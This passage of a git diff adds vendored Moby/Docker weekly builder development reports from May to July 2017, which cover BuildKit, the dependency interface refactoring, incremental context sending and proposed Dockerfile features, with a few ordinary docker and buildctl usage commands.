+- The CI whitelists and ACLs were updated ([linuxkit-ci#11](https://github.com/linuxkit/linuxkit-ce/issues/11) [linuxkit-ci#15](https://github.com/linuxkit/linuxkit-ce/issues/15) [linuxkit/linuxkit-ci#10](https://github.com/linuxkit/linuxkit-ce/issues/10) [@rn] [@justincormack])
+- Fix spelling errors ([#2079](https://github.com/linuxkit/linuxkit/issues/2079) [@ndauten])
+- Fix typo in dev report ([#2094](https://github.com/linuxkit/linuxkit/issues/2094) [@justincormack])
+- Fix dead Link to VMWare File ([#2082](https://github.com/linuxkit/linuxkit/issues/2082) [@davefreitag])
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-01.md b/vendor/github.com/docker/docker/reports/builder/2017-05-01.md
new file mode 100644
index 0000000000..73d1c49303
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-05-01.md
@@ -0,0 +1,47 @@
+# Development Report for May 01, 2017
+
+### buildkit
+
+As part of the goals of [Moby](https://github.com/moby/moby#transitioning-to-moby) to split the current platform into reusable components and to provide a future vision for the builder component new [buildkit proposal](https://github.com/moby/moby/issues/32925) was opened with early design draft.
+
+Buildkit is a library providing the core essentials of running a build process using isolated sandboxed commands. It is designed for extensibility and customization. Buildkit supports multiple build declaration formats(frontends) and multiple ways for outputting build results(not just docker images). It doesn't make decisions for a specific worker, snapshot or exporter implementations.
+
+It is designed to help find the most efficient way to process build tasks and intelligently cache them for repeated invocations. 
+
+### Quality: Dependency interface switch
+
+To improve quality and performance, a new [proposal was made for switching the dependency interface](https://github.com/moby/moby/issues/32904) for current builder package. That should fix the current problems with data leakage and conflicts caused by daemon state cleanup scripts.
+
+@dnephin is in progress of refactoring current builder code to logical areas as a preparation work for updating this interface.
+
+Merged as part of this effort:
+
+- [Refactor Dockerfile.parser and directive](https://github.com/moby/moby/pull/32580)
+- [Refactor builder dispatch state](https://github.com/moby/moby/pull/32600)
+- [Use a bytes.Buffer for shell_words string concat](https://github.com/moby/moby/pull/32601)
+- [Refactor `Builder.commit()`](https://github.com/moby/moby/pull/32772)
+- [Remove b.escapeToken, create ShellLex](https://github.com/moby/moby/pull/32858)
+
+### New feature: Long running session
+
+PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enabled advanced features like incremental context send, build credentials from the client, ssh forwarding etc. is looking for initial design review. It is currently open if features implemented on top of it would use a specific transport implementation on the wire or a generic interface(current implementation). @tonistiigi is working on adding persistent cache capabilities that are currently missing from that PR. It also needs to be figured out how the [cli split](https://github.com/moby/moby/pull/32694) will affect features like this. 
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+These proposals have gotten mostly positive feedback for now. We will leave them open for a couple of more weeks and then decide what actions to take in a maintainers meeting. Also, if you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other new builder features currently in code-review:
+
+[`docker build --iidfile` to capture the ID of the build result](https://github.com/moby/moby/pull/32406) 
+
+[Allow builds from any git remote ref](https://github.com/moby/moby/pull/32502)
+
+### Backlog:
+
+[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first.
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-08.md b/vendor/github.com/docker/docker/reports/builder/2017-05-08.md
new file mode 100644
index 0000000000..d9396ab764
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-05-08.md
@@ -0,0 +1,57 @@
+# Development Report for May 08, 2017
+
+
+### Quality: Dependency interface switch
+
+Proposal for [switching the dependency interface](https://github.com/moby/moby/issues/32904) for current builder package. That should fix the current problems with data leakage and conflicts caused by daemon state cleanup scripts.
+
+Merged as part of this effort:
+
+- [Move dispatch state to a new struct](https://github.com/moby/moby/pull/32952)
+- [Cleanup unnecessary mutate then revert of b.runConfig](https://github.com/moby/moby/pull/32773)
+
+In review:
+- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061)
+- [Expose GetImage interface for builder](https://github.com/moby/moby/pull/33054)
+
+### Merged: docker build --iidfile
+
+[`docker build --iidfile` to capture the ID of the build result](https://github.com/moby/moby/pull/32406). New option can be used by the CLI applications to get back the image ID of build result. API users can use the `Aux` messages in progress stream to also get the IDs for intermediate build stages, for example to share them for build cache.
+
+### New feature: Long running session
+
+PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc.
+
+@simonferquel proposed a [grpc-only version of that interface](https://github.com/moby/moby/pull/33047) that should simplify the setup needed for describing new features for the session. Looking for design reviews.
+
+The feature also needs to be reworked after CLI split.
+
+### buildkit
+
+Not much progress [apart from some design discussion](https://github.com/moby/moby/issues/32925). Next step would be to open up a repo.
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other new builder features currently in code-review:
+
+[Allow builds from any git remote ref](https://github.com/moby/moby/pull/32502)
+
+[Fix a case where using FROM scratch as NAME would fail](https://github.com/moby/moby/pull/32997)
+
+### Backlog:
+
+[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first.
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-15.md b/vendor/github.com/docker/docker/reports/builder/2017-05-15.md
new file mode 100644
index 0000000000..cfc742f3aa
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-05-15.md
@@ -0,0 +1,64 @@
+# Development Report for May 15, 2017
+
+### Multi-stage builds fixes coming in 17.06-rc1
+
+Some bugs were discovered in new multi-stage build feature, release in 17.05. 
+
+When using an image name directly in `COPY --from` without defining a build stage, the data associated with that image was not properly cleaned up.
+
+If a second was based on `scratch` image, the metadata from the previous stage didn't get reset, forcing the user to clear it manually with extra commands.
+
+Fixes for these are merged for the next release, everyone is welcomed to test it once `17.06-rc1` is out.
+
+- [Fix resetting image metadata between stages for scratch case](https://github.com/moby/moby/pull/33179)
+- [Fix releasing implicit mounts](https://github.com/moby/moby/pull/33090)
+- [Fix a case where using FROM scratch as NAME would fail](https://github.com/moby/moby/pull/32997)
+
+
+### Quality: Dependency interface switch
+
+Work continues on making the builder dependency interface more stable. This week methods for getting access to source image were swapped out to a new version that keeps a reference to image data until build job has complete.
+
+Merged as part of this effort:
+
+- [Expose GetImage interface for builder](https://github.com/moby/moby/pull/33054)
+
+In review:
+- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061)
+- [Refactor COPY/ADD dispatchers](https://github.com/moby/moby/pull/33116)
+
+
+### New feature: Long running session
+
+PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc.
+
+@simonferquel updated a [grpc-only version of that interface](https://github.com/moby/moby/pull/33047) and mostly seems that consensus was achieved for using only grpc transport. @tonistiigi finished up persistent cache layer and garbage collection for file transfers. The PR now needs to be split up because CLI has moved. Once that is done, the main PR should be ready for review early this week.
+
+### Merged: Specifying any remote ref in git checkout URLs
+
+Building from git sources now allows [specifying any remote ref](https://github.com/moby/moby/pull/32502). For example, to build a pull request from GitHub you can use: `docker build git://github.com/moby/moby#pull/32502/head`.
+
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other new builder features currently in code-review:
+
+-
+
+### Backlog:
+
+[Build secrets](https://github.com/moby/moby/pull/30637) will be brought up again in next maintainer's meeting to evaluate how to move on with this, if any other proposals have changed the objective and if we should wait for swarm secrets to be available first.
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-22.md b/vendor/github.com/docker/docker/reports/builder/2017-05-22.md
new file mode 100644
index 0000000000..29ecc6bb9a
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-05-22.md
@@ -0,0 +1,47 @@
+# Development Report for May 22, 2017
+
+### New feature: Long running session
+
+PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding etc. is ready for reviews. This is blocking many new features like token signing, not pulling unnecessary context files, exposing sources outside working directory etc.
+
+
+### Quality: Dependency interface switch
+
+Work continues on making the builder dependency interface more stable.
+
+Merged as part of this effort this week:
+
+- [Refactor COPY/ADD dispatchers](https://github.com/moby/moby/pull/33116)
+
+In review:
+- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061)
+
+### Buildkit
+
+[Diff and snapshot services](https://github.com/containerd/containerd/pull/849) were added to containerd. This is a required dependency for [buildkit](https://github.com/moby/moby/issues/32925).
+
+### Proposals discussed in maintainers meeting
+
+New builder proposals were discussed in maintainers meeting. The decision was to give 2 more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up.
+
+Build secrets and its possible overlap with [--mount](https://github.com/moby/moby/issues/32507) was discussed as well. The decision was to create a [new issue](https://github.com/moby/moby/issues/33343)(as the [old PR](https://github.com/moby/moby/pull/30637) is closed) to track this and avoid it from blocking `--mount` implementation. 
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other new builder features currently in code-review:
+
+-
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-05-29.md b/vendor/github.com/docker/docker/reports/builder/2017-05-29.md
new file mode 100644
index 0000000000..33043d9f3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-05-29.md
@@ -0,0 +1,52 @@
+# Development Report for May 29, 2017
+
+### New feature: Long running session
+
+PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) that enables advanced features like incremental context send, build credentials from the client, ssh forwarding, etc. is ready for reviews. It is blocking many new features like the token signing, not pulling unnecessary context files, exposing sources outside working directory, etc. Maintainers are encouraged to give this one a review!
+
+
+### Quality: Dependency interface switch
+
+Work continues on making the builder dependency interface more stable.
+
+Merged as part of this effort this week:
+
+- [Refactor builder probe cache and container backend](https://github.com/moby/moby/pull/33061)
+
+@dnephin continues working on the copy/export aspects of the interface.
+
+### Buildkit
+
+Some initial proof of concept code for [buildkit](https://github.com/moby/moby/issues/32925) has been pushed to https://github.com/tonistiigi/buildkit_poc . It's in a very early exploratory stage. Current development has been about providing concurrent references based access to the snapshot data that is backed by containerd. More info should follow in next weeks, including hopefully opening up an official repo. If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby.
+
+### Proposals discussed in maintainers meeting
+
+Reminder from last week: New builder proposals were discussed in maintainers meeting. The decision was to give 2 more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up.
+
+New issue about [build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality please make yourself heard.
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other new builder features currently in code-review:
+
+[Fix canceling builder on chunked requests](https://github.com/moby/moby/pull/33363)
+
+[Fix parser directive refactoring](https://github.com/moby/moby/pull/33436)
+
+[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161)
+
+[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088)
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-05.md b/vendor/github.com/docker/docker/reports/builder/2017-06-05.md
new file mode 100644
index 0000000000..3746c2639e
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-06-05.md
@@ -0,0 +1,58 @@
+# Development Report for June 5, 2017
+
+### New feature: Long running session
+
+Similarly to last week, the PR for [adding long-running session between daemon and cli](https://github.com/moby/moby/pull/32677) is waiting for reviews.  It is blocking many new features like the token signing, not pulling unnecessary context files, exposing sources outside working directory, etc. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release.
+
+
+### Quality: Dependency interface switch
+
+Work continues on making the builder dependency interface more stable.
+
+PRs currently in review as part of this effort:
+
+- [Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454)
+
+This PR is the core of the update that removes the need to track active containers and instead of lets builder hold references to layers while it's running.
+
+Related to this, @simonferquel opened a [WIP PR](https://github.com/moby/moby/pull/33492) that introduces typed Dockerfile parsing. This enables making [decisions about dependencies](https://github.com/moby/moby/issues/32550#issuecomment-297867334) between build stages and reusing Dockerfile parsing as a buildkit frontend.
+
+### Buildkit
+
+Some initial proof of concept code for [buildkit](https://github.com/moby/moby/issues/32925) has been pushed to https://github.com/tonistiigi/buildkit_poc . It's in a very early exploratory stage. Current codebase includes libraries for getting concurrency safe references to containerd snapshots using a centralized cache management instance. There is a sample source implementation for pulling images to these snapshots and executing jobs with runc on top of them. There is also some utility code for concurrent execution and progress stream handling. More info should follow in next weeks, including hopefully opening up an official repo. If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby.
+
+### Proposals discussed in maintainers meeting
+
+Reminder from last week: New builder proposals were discussed in maintainers meeting. The decision was to give two more weeks for anyone to post feedback to [IMPORT/EXPORT commands](https://github.com/moby/moby/issues/32100) and [`RUN --mount`](https://github.com/moby/moby/issues/32507) and accept them for development if nothing significant comes up. It is the last week to post your feedback on these proposals or the comments in them. You can also volunteer to implement them.
+
+A new issue about [build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard.
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other builder PRs merged last week
+
+[Fix canceling builder on chunked requests](https://github.com/moby/moby/pull/33363)
+
+[Fix parser directive refactoring](https://github.com/moby/moby/pull/33436)
+
+### Builder features currently in code-review:
+
+[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161)
+
+[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088)
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-12.md b/vendor/github.com/docker/docker/reports/builder/2017-06-12.md
new file mode 100644
index 0000000000..df5d801e76
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-06-12.md
@@ -0,0 +1,58 @@
+# Development Report for June 12, 2017
+
+
+### Buildkit
+
+[Proposal](https://github.com/moby/moby/issues/32925)
+
+More updates to the [POC repo](https://github.com/tonistiigi/buildkit_poc). It now contains binaries for the daemon and client. Examples directory shows a way for invoking a build job by generating the internal low-level build graph definition with a helper binary(as there is not support for frontends yet). The grpc control server binary can be built in two versions, one that connects to containerD socket and other that doesn't have any external dependencies.
+
+If you have questions or want to help, stop by the issues section of that repo or the proposal in moby/moby.
+
+### Typed Dockerfile parsing
+
+[PR](https://github.com/moby/moby/pull/33492)
+
+New PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers.
+
+### Long running session & incremental file sending
+
+[PR ](https://github.com/moby/moby/pull/32677) 
+
+Same status as last week. The PR went through one pass of review from @dnephin and has been rebased again. Maintainers are encouraged to give this one a review so it can be included in `v17.07` release.
+
+
+### Quality: Dependency interface switch
+
+[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR is waiting for a second review. 
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other builder PRs merged last week
+
+
+### Builder features currently in code-review:
+
+[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161)
+
+[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088)
+
+### Backlog
+
+[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard.
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-06-26.md b/vendor/github.com/docker/docker/reports/builder/2017-06-26.md
new file mode 100644
index 0000000000..e0ba95a7a5
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-06-26.md
@@ -0,0 +1,78 @@
+# Development Report for June 26, 2017
+
+
+### BuildKit
+
+[Repo](https://github.com/moby/buildkit)
+[Proposal](https://github.com/moby/moby/issues/32925)
+
+New development repo is open at https://github.com/moby/buildkit
+
+The readme file provides examples how to get started. You can see an example of building BuildKit with BuildKit.
+
+There are lots of new issues opened as well to track the missing functionality. You are welcomed to help on any of them or discuss the design there.
+
+Last week most of the work was done on improving the `llb` client library for more complicated use cases and providing traces and interactive progress of executed build jobs.
+
+The `llb` client package is a go library that helps you to generate the build definition graph. It uses chained methods to make it easy to describe what steps need to be running. Mounts can be added to the execution steps for defining multiple inputs or outputs. To prepare the graph, you just have to call `Marshal()` on a leaf node that will generate the protobuf definition for everything required to build that node.
+
+### Typed Dockerfile parsing
+
+[PR](https://github.com/moby/moby/pull/33492)
+
+This PR that enables parsing Dockerfiles into typed structures so they can be preprocessed to eliminate unnecessary build stages and reused with different kinds of dispatchers(eg. BuildKit).
+
+The PR had some review and updates in last week. Should be ready to code review soon.
+
+### Merged: Long running session & incremental file sending
+
+[PR](https://github.com/moby/moby/pull/32677) 
+
+Incremental context sending PR was merged and is expected to land in `v17.07`.
+
+This feature experimental feature lets you skip sending the build context to the daemon on repeated builder invocations during development. Currently, this feature requires a CLI flag `--stream=true`. If this flag is used, one first builder invocation full build context is sent to the daemon. On a second attempt, only the changed files are transferred.
+
+Previous build context is saved in the build cache, and you can see how much space it takes form `docker system df`. Build cache will be automatically garbage collected and can also be manually cleared with `docker prune`.
+
+### Quality: Dependency interface switch
+
+[Move file copying from the daemon to the builder](https://github.com/moby/moby/pull/33454) PR was merged.
+
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other builder PRs merged last week
+
+[Warn/deprecate continuing on empty lines in `Dockerfile`](https://github.com/moby/moby/pull/29161)
+
+[Fix behavior of absolute paths in .dockerignore](https://github.com/moby/moby/pull/32088)
+
+[fix copy —from conflict with force pull](https://github.com/moby/moby/pull/33735)
+
+### Builder features currently in code-review:
+
+[Fix handling of remote "git@" notation](https://github.com/moby/moby/pull/33696)
+
+[builder: Emit a BuildResult after squashing.](https://github.com/moby/moby/pull/33824)
+
+[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704)
+
+### Backlog
+
+[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard.
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-07-10.md b/vendor/github.com/docker/docker/reports/builder/2017-07-10.md
new file mode 100644
index 0000000000..76aeee0f1d
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-07-10.md
@@ -0,0 +1,65 @@
+# Development Report for July 10, 2017
+
+
+### BuildKit
+
+[Repo](https://github.com/moby/buildkit)
+[Proposal](https://github.com/moby/moby/issues/32925)
+
+Many new features have been added since the last report.
+
+The build definition solver was updated to detect the identical parts of the graph sent by different clients and synchronize their processing. This is important when multiple targets of the same project are built at the same time and removes any duplication of work.
+
+Running build jobs now has support for graceful canceling and clear error reporting in case some build steps fail or are canceled. Bugs that may have left state dir in an inconsistent state of server shutdown were fixed.
+
+`buildctl du` command now shows all the information about allocated and in-use snapshots. It also shows the total space used and total reclaimable space. All snapshots are now persistent, and state is not lost with server restarts.
+
+New metadata package was implemented that other packages can use to add persistent and searchable metadata to individual snapshots. First users of that feature are the content blobs mapping on pull, size cache for `du` and instruction cache. There is also a new debug command `buildctl debug dump-metadata` to inspect what data is being stored.
+
+The first version of instruction cache was implemented. This caching scheme has many benefits compared to the current `docker build` caching as it doesn't require all data to be locally available to determine the cache match. The interface for the cache implementation is much simpler and could be implemented remotely as it only needs to store the cache keys and doesn't need to understand or compare their values. Content-based caching will be implemented on top of this work later.
+
+Separate source implementation for git repositories is currently in review. Using this source for accessing source code in git repositories has many performance and caching advantages. All the build jobs using the same git remote will use a shared local repository where updates will be pulled. All the nodes based on a git source will be cached using the commit ID of the current checkout.
+
+Next areas to be worked on will be implementing first exporters for getting access to the build artifacts and porting over the client session/incremental-send feature from `17.07-ce`.
+
+### Typed Dockerfile parsing
+
+[PR](https://github.com/moby/moby/pull/33492)
+
+The PR is in code review and waiting for feedback. Hopefully ready to be merged this week.
+
+### Quality: Dependency interface switch
+
+No updates for this week. Metadata commands need to be updated but it is probably easier to do it after https://github.com/moby/moby/pull/33492 has been merged.
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989)
+
+New: [RFC: Distributed BuildKit](https://github.com/moby/buildkit/issues/62)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Other builder PRs merged last week
+
+[build: fix add from remote url](https://github.com/moby/moby/pull/33851)
+
+### Builder features currently in code-review:
+
+[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704)
+
+### Backlog
+
+[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard.
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/reports/builder/2017-07-17.md b/vendor/github.com/docker/docker/reports/builder/2017-07-17.md
new file mode 100644
index 0000000000..96cc8d1849
--- /dev/null
+++ b/vendor/github.com/docker/docker/reports/builder/2017-07-17.md
@@ -0,0 +1,79 @@
+# Development Report for July 17, 2017
+
+
+### BuildKit
+
+[Repo](https://github.com/moby/buildkit)
+[Proposal](https://github.com/moby/moby/issues/32925)
+
+Following features were added last week:
+
+#### Git source
+
+Source code from git repositories can now be accessed directly, similarly for images can be accessed, without the need to execute `git clone`. This has many performance and caching advantages. It accesses the remote repository using shallow fetches to only pull the required data and a uses a shared bare repository for intermediate cache between build invocations. The instruction cache for the git source is based on a commit hash and not string arguments. This means that you can always be sure that you are building the correct source and that you never build the same source twice.
+
+#### Containerd exporter
+
+Exporters are used for getting build artifacts out of buildkit. The first exporter that was implemented allows exposing the image to containerd so it can be run and pushed with `ctr` tool. `buildctl` has `--exporter` flag for specifying the exporter and `--exporter-opt` for custom values passed to the exporter. In the case of image exporter an image name can be specified.
+
+For example:
+
+```
+go run ./examples/buildkit2/buildkit.go | buildctl build --exporter image --exporter-opt name=docker.io/moby/buildkit:dev
+```
+
+Accessing from ctr/dist:
+
+```
+ctr --namespace buildkit images ls
+ctr --namespace buildkit rootfs unpack <manifest-sha>
+ctr --namespace buildkit run -t docker.io/moby/buildkit:dev id ash
+```
+
+#### Local source
+
+Buildkit now supports building from local sources. Snapshot of the local source files is created similarly to `docker build` build context. The implementation is based on the [incremental context send](https://github.com/moby/moby/pull/32677) feature in `docker-v17.07`. To use in `buildctl` the source definition needs to define a name for local endpoint, and `buildctl build` command provides a mapping from this name to a local directory with a `--local` flag.
+
+```
+go run ./examples/buildkit3/buildkit.go --local  | buildctl build --local buildkit-src=.
+``` 
+
+### Typed Dockerfile parsing
+
+[PR](https://github.com/moby/moby/pull/33492)
+
+Didn't manage to merge this PR yet. Still in code-review.
+
+
+### Feedback for `RUN --mount` / `COPY --chown`
+
+There was some new discussion around [`RUN --mount`](https://github.com/moby/moby/issues/32507) or [`COPY --chown`](https://github.com/moby/moby/issues/30110) feature. Currently, it seems that it may be best to try the shared cache capabilities described in `RUN --mount` in https://github.com/moby/buildkit first(it already supports the generic mounting capabilities). So to unblock the people waiting only on the file owner change features it may make sense to implement `COPY --chown` first. Another related candidate for `v17.08` release is https://github.com/moby/moby/issues/32816. 
+
+
+### Proposals for new Dockerfile features that need design feedback:
+
+[Add IMPORT/EXPORT commands to Dockerfile](https://github.com/moby/moby/issues/32100)
+
+[Add `DOCKEROS/DOCKERARCH` default ARG to Dockerfile](https://github.com/moby/moby/issues/32487)
+
+[Add support for `RUN --mount`](https://github.com/moby/moby/issues/32507)
+
+[DAG image builder](https://github.com/moby/moby/issues/32550)
+
+[Option to export the hash of the build context](https://github.com/moby/moby/issues/32963) (new)
+
+[Allow --cache-from=*](https://github.com/moby/moby/issues/33002#issuecomment-299041162) (new)
+
+[Provide advanced .dockeringore use-cases](https://github.com/moby/moby/issues/12886) [2](https://github.com/moby/moby/issues/12886#issuecomment-306247989)
+
+New: [RFC: Distributed BuildKit](https://github.com/moby/buildkit/issues/62)
+
+If you are interested in implementing any of them, leave a comment on the specific issues.
+
+### Builder features currently in code-review:
+
+[Fix shallow git clone in docker-build](https://github.com/moby/moby/pull/33704)
+
+### Backlog
+
+[Build secrets](https://github.com/moby/moby/issues/33343) has not got much traction. If you want this feature to become a reality, please make yourself heard.
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/restartmanager/restartmanager.go b/vendor/github.com/docker/docker/restartmanager/restartmanager.go
index 570fc93802..6468ccf7e6 100644
--- a/vendor/github.com/docker/docker/restartmanager/restartmanager.go
